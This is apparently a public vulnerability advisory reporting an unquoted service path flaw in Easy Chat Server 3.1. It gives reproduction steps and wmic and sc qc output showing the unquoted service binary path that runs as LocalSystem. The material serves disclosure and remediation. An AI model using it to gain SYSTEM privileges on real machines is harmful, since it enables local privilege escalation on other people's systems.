Easy Chat Server 3.1 Unquoted Service Path

Easy Chat Server version 3.1 suffers from an unquoted service path vulnerability.


MD5 | 042bf934b7a24f04654a740edef44dd7

Exploit Title: Easy Chat Server v3.1 - 'Easy Chat Service' Unquoted Service Path
Exploit Author: boku
Date: 02/10/2020
Vendor Homepage: http://www.echatserver.com/
Software Link: http://www.echatserver.com/ecssetup.exe
Version: 3.1
Tested On: Windows 10 (32-bit)
# Recreate:
# 1) Download & install Easy Chat Server 3.1
# 2) Open Easy Chat Server and click the 'Service...' Button on the bottom right
# 3) Click 'Install Service' Button

C:\Users\elaglor>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Easy Chat Service C:\EFS Software\Easy Chat Server\ecsService.exe Auto

C:\Users\elaglor>sc qc "Easy Chat Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Easy Chat Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\EFS Software\Easy Chat Server\ecsService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Easy Chat Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Related Posts